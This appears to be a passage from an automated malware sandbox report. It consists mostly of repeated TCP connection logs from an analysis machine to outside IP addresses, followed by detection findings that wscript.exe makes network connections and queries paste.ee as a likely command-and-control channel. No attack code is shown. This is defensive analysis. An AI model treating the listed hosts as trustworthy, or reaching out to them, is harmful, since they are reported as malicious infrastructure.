Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 104.21.84.67:80 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 104.21.84.67:80 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 104.21.84.67:80 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 104.21.84.67:80 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 104.21.45.138:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
